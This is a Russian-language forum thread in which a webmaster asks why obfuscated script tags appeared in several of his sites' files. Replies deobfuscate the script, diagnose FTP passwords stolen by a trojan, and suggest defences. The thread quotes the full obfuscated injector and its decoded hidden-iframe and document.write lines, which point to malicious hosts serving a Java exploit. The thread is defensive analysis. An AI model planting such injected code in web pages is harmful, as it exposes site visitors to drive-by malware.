Взлом сайтов. Вставлен произвольный код?

Question

[orloffkirill]

Добрый день!


На днях на нескольких сайтах на CodeIgniter, одном на Joomla, одном на Wordpress и на одном совсем без CMS был установлен произвольный код в файлах index.*, home.*, page.*, auth.*. Т.е. в каждый из файлов был установлен тег script с произвольным кодом. Внешне это отображалось как приглашение установить новую мультимедийную плюшку для браузера.


Собственно, сам скрипт (без! знака в слове script и без переводов строки — не умещался):

<pre><code class="javascript">&lt;sc!ript type=&quot;text/javascript&quot; language=&quot;javascript&quot;&gt;
wkllp=&quot;33933333339999333999339939993933
399993393993993339933939339333333999393339999339399933333
993393933999939339333933999393339933939399993333999393333
939999399333993999339939993399339333933399999333933399399
939333993393939993339399339333993939933933333399993993999
399939939339399339333999393339939333339993933393333333993
333399933333999933333999399399393333993393939939339399339
993993933339993933339993933393333333993333399933333999933
333999399399339933999339339933339399399393993393939933393
399399993999339339933933399339393999339333999393339333333
993999339939999339993993999399339939339399933993993933939
933393399393393993993339939339399939333999933933999393339
333333993933339939339399339333993393339933939399399933399
939939999939339999333393999939993399399939333999933939939
933399339393399999333999933399393393993399339993393399333
393993993939933939339333333993933939933933339999393393339
339993933399339393999333939933933399393993393339333933333
399933993999339339933399339999393393339339939333399939333
999393339993333339993933393999933939999399339933999399939
993339399933393999399939933939399339393999339339933999339
933993393999339933399399399993393999339933399399333993393
999939933339399339333393999339939393399933333993399933933
393339999933399993333939999399393393993399339993393399333
39399399393993393933999993&quot;;znanx=100;wdlgs=this;nsjvu=&quot;i&quot;+&quot;te&quot;;
vurba=116;nqcs=&quot;wr&quot;+nsjvu;for(gbcim in wdlgs){if(gbcim.length==8 && 
gbcim.charCodeAt(0)==znanx && gbcim.charCodeAt(7)==vurba){break;}}o=&quot;&quot;;
imvuf=0;qpgsu=wdlgs[gbcim];ycamh=57;while (imvuf&lt;wkllp.length){
bnehf=0;for(mkrku=0;mkrku&lt;8;mkrku++){bnehf=bnehf&lt;&lt;1;if(
wkllp.charCodeAt(imvuf+mkrku)==ycamh){bnehf++;}}imvuf=imvuf+3;
qpgsu[nqcs](String.fromCharCode(bnehf));imvuf=imvuf+5;}&lt;/sc!ript&gt;

Прямой связи CI-Joomla-WP-чистыйHTML я не вижу. Т.е. видимо, это не критическая уязвимость в каком-либо движке.


В логах апача странных запросов или даже каких-либо запросов во время модификации файла нет (+-10минут).


Подозрительно выглядят логи auth.log (настоящий username изменен; ip, с которого пришел запрос — нет):

Jan 31 08:38:45 User proftpd[12006]: Serv (dslb-094-222-057-074.pools.arcor-ip.net[::ffff:94.222.57.74]) - USER user: no such user found from dslb-094-222-057-074.pools.arcor-ip.net [::ffff:94.222.57.74] to ::ffff:89.108.126.42:21 <br/>
Jan 31 08:38:45 User proftpd[12006]: Serv (dslb-094-222-057-074.pools.arcor-ip.net[::ffff:94.222.57.74]) - SECURITY VIOLATION: root login attempted. <br/>
Jan 31 08:38:45 User proftpd[12006]: Serv (dslb-094-222-057-074.pools.arcor-ip.net[::ffff:94.222.57.74]) - SECURITY VIOLATION: root login attempted. <br/>
<br/>
Feb 1 10:56:40 User proftpd[19762]: Serv (::ffff:193.85.168.74[::ffff:193.85.168.74]) - USER webmaster1: Login successful. <br/>
Feb 1 10:56:40 User proftpd[19764]: Serv (::ffff:193.85.168.74[::ffff:193.85.168.74]) - USER webmaster2: Login successful. <br/>
Feb 1 10:56:40 User proftpd[19762]: Serv (::ffff:193.85.168.74[::ffff:193.85.168.74]) - FTP session closed. <br/>
Feb 1 10:56:40 User proftpd[19764]: Serv (::ffff:193.85.168.74[::ffff:193.85.168.74]) - FTP session closed.

SSH закрыт фаерволом для всех, кроме меня.


Хочу задать вопрос — что это может быть? Как этого избежать? Какие еще логи нужны для анализа?

Comments

[orloffkirill]

Проверили DrWeb.CureIt! свои компьютеры — ни одного вируса.

Answer 1

[charon]

это был взлом пароля на фтп, вероятно. Очень вероятно, что на компе разработчика поселился троян, который и выдал пароль злоумышленникам.
Как защититься? Переходите на Линукс на рабочих странциях :) Другой вариант: некоторые хостеры предлагают ограничить фтп-доступ определёнными айпишниками — воспользуйтесь этой возможностью.
Ну и, конечно же, поменяйте пароль на фтп после тщательной проверки на вирусы всех компов, где этот пароль мог засветиться.

Comments

[orloffkirill]

Очень возможно!
Пока ограничил фтп-доступ для определённых айпи, посмотрим, что будет.
Насчет вирусов — тоже большой вопрос. На несколько сайтов — я согласен, но на определённые пару паролей нет ни у кого :) (кроме как у меня в черной книжечке)

[orloffkirill]

2topy, zaregan:
и где же хранить?

[DorBer]

keepass и прочие менеджеры.

Answer 2

[Paketik]

Проанализировав тот код, что вы мне дали в ПМ:
в браузер выкидывается:

document.write('<iframe src="http://gt32.co.cc/index.php?tp=32b260002f490aa3"frameborder="0"></iframe>');

При этом идет скачка файла gt32.co.cc/games/javaobe.jar, который определяется как Exploit.Java.176
www.virustotal.com/file-scan/report.html?id=8d240bc87e5de0abd6d5872698dd7bfa06bcfee26055e585fd7844fbf3d589a1-1296664900

анализирем html:

<applet code='prev.monoid.class' archive='./games/javaobe.jar'><param value='Mjjdo##pjuAsVOsVV#wsdMdCRWuL&/W1' name="dskvnds"/>

значению dskvnds передается переменная Mjjdo##pjuAsVOsVV#wsdMdCRWuL&/W1
глянем файлик через Java Decompiler:
chaketik.pastebin.com/PXkj4Q0J

пока достал только пару переменных, я просто первый раз копаюсь в коде java ;)

      koli=exe.
      ipol=ridpmt.oi.avaj
      bsde =eman.so
      bsda = .exe
      bsdz = java.io.tmpdir
      bsdc =  os.name

интересно что на хосте открыты порты
5222/tcp open jabber Jabber instant messaging server (Protocol 1.0)
5269/tcp open jabber Jabber instant messaging server (Protocol 1.0)

продолжаю копать)

Comments

[orloffkirill]

Ждём новых раскопок!

Answer 3

[Paketik]

Деобфусцировал ваш JavaScript, вот что вышло:

<style type="text/css">
#teqdk 
{
width: 0px;height: 0px;frameborder: no;visibility: hidden;
}
</style>
<iframe id="teqdk" src="http://fwqqweerg3.co.cc/ad.jpg"></iframe>

Comments

[orloffkirill]

Поздравляю! У нас тоже самое получилось. Правда, если зайти браузером (через VirtualPC :) ) на этот сайт непосредственно, ничего не произойдет. Но установка мультимедийных плагинов в ифрэйме выдается.
Сейчас ФФ выдал, что сайт потенциально опасен.

[Paketik]

У меня уже домен не резолвится, а так интересно было бы посмотреть что внутри того JPG файла (вероятно експлойт который подгружает на клиентскую машину софт)

[orloffkirill]

Есть еще одна модификация этого же скрипта, я вам пришлю в личку, поскольку смотрю, что вам понравилось мозги ломать.

Answer 4

[zzipper]

Может быть вы редачили код по удаленке каким-нибудь варезным редактором?
Сам с таким сталкивался. Редактировал кучку файлов через ломаный dreamweaver и получил во всех тех файлах левые iframe'ы.

Comments

[orloffkirill]

Нет, исключено.
Код редактируется только на дев-локации с использованием Notepad++ и Aptana.
Иногда мелкие правки делаются с помощью Far Manager или непосредственно vim`ом.

Answer 5

[Дмитрий]

У меня была точно такая история. На компах у двух из 6 пользователей, которые заливали содержимое на сайт, были трояны. Пароли к ftp были потырены из тотал коммандера. Причем пользователи с пеной на губах уверяли, что компы у них чистые, аваст запущен и «вот только что сканировал на вирусы». Помогли логи ftp и отключения логинов по одному.

А от вирусов помогает только сканирование с загрузкой с live cd.

Мораль: не верьте пользователям, даже если они не злоумышленники!

Comments

[3ds]

К авасту мало доверия — вчера только у девушки смотрел четез тимвьювер — весь hosts был перезаписан, все сайты пересылались на 1 ip…

Answer 6

[Jazzist]

Грепните системные файлы на предмет даты последнего изменения.

Comments

[orloffkirill]

Пардон, не совсем юникс-гуру, подскажите как? Грепать умею, системные файлы — не умею. Debian.

[Дмитрий]

Системные — находящиеся в /etc/
И скорее не grep, а сначала find /etc -atime [-|+XX]
и далее man find на предмет того, что вам конкретно надо.
А уже потом, возможно, grep.

[Jazzist]

Угу!

Answer 7

[Radik_Wind]

Одназначно вы подхватили трояна. У меня также было. После чего я поменял антивирус с Dr. Web на Avast и Avast нашел трояна, которого Dr. Web пропустил. После того как подличил систему сменил все пасы с ftp и восстановил сайты из бэкапов и больше такого не было. Так что проверяте систему на наличие злых лошадок :)

Answer 8

[Сергей]

У меня было один раз такое, скрипт правда другой был, но не суть. влезли тоже через фтп.
Теперь я вдирект админ раз в неделю делаю бэкапы. Удобно потом всё восстановить если что.

Answer 9

[MiXei4]

Есть ещё вероятность утечки пароля от админа сайта. У нас так украли пароли сохраненные в firefox без мастерпароля. Дальше зашли в админ, залили шелл на сервер и меняли уже всё что хотели.
Так что я бы посоветовал сменить пароли и от админа и проверить сайты на наличие левых скриптов…

Answer 10

[Bartez]

Была похожая ситуация со вставкой стороннего кода в aspx файлы.

Проверил права доступа «на запись» через хостеровскую админку. Всё было в порядке, для http – только чтение. Пожаловался хостеру, те извинились, сказали дыру закрыли.
Больше не повторялось.
На всякий случай ещё сменил FTP пароль. И проверил DEV-машину на вирусы, вирусов не было.

Вообщем жалуйтесь хостеру.

Comments

[orloffkirill]

Немного бесполезно. За мной 1 VPS, 1 Dedicated, и 2 Shared. И если с двумя шаредами — понятно, жаловаться. То с VPS и дедиком — бесполезняк. Хостер отписывает типа «мы, конечно, все понимаем, но наш специалист если и полезет, то за 1500р.»

Answer 11

[antivir]

Автор, используйте ftp-клиент с мастер-паролем (например, FlashFXP с AES шифрованием). Это ничем не хуже, чем разные кипасы.
Ни одна мера не даст вам 100% гарантии: троян может снифить клавиатуру и мышь.

Comments

[orloffkirill]

FlashFXP перестал использовать, когда у них были проблемы с заливкой файлов — заливаешь 2 разных файла с разным размером, он их заливает, но переименовывает наоборот. Могу найти пруф, если надо.

Но это все лирика, а чем лучше FlashFXP с AES? Есть же пароль от фтп на серваке, который я все равно впишу в фтп-клиент — а вы опять же вспомнили про кейлоггеры — тогда какая разница от всего этого шифрования? Я могу представить, что теоретически при выходе по Wi-Fi можно засниффать пакеты и вычленить пароль… но это же только в теории.

[antivir]

Я всего лишь привел пример клиента с мастер-паролем. В вашем случае троян вытащил пароли из настроек ftp-клиента. Если бы настройки были зашифрованы — этого бы не произошло.
Про кейлоггеры — разница в том, что в вашем случае использовался довольно легкий способ получения паролей. Кейлоггеры спрятать от антивирусов сложнее.
Запомните одну простую вещь: безопасность данных не должна стоить дороже, чем сами данные (в том числе — по трудозатратам). Целесообразность защиты каждый определяет сам для своего конкретного случая.

[antivir]

Еще. Кейлоггеры конкретно для вас — пока гипотетическое явление, а кража нешифрованных паролей — практическое. Тем более что в прошлом году это явление было массовым. Пострадали многие, в том числе и я.

[kSx]

Если использовать Keepass с мастер-паролем и файлом-ключом — клавиатуру слушать не поможет, если только буфер обмена.

[antivir]

А мастер-пароль будет введен как? Надо понимать — по мановению свыше?

Answer 12

[Elendai]

Что-то у вас до боли знакомая симптоматика.

строго рекомендую проверить апач на предмет наличия незнакомых модулей

в моем случае это был mod_chart_proxy, поставленный от рута с измененной датой создания. Спас админ ВДС-ки, который, даже не зная уже за что взяться, пол ночи ВРУЧНУЮ сверял конфиги.

Правда было немного хуже — все файлы чистые, даты создания системных модулей разумные, зайдя один раз на сайт, второй раз фрейм показывался только после чистки CCleaner'ом (он в темп писал какой-то троян .pdf).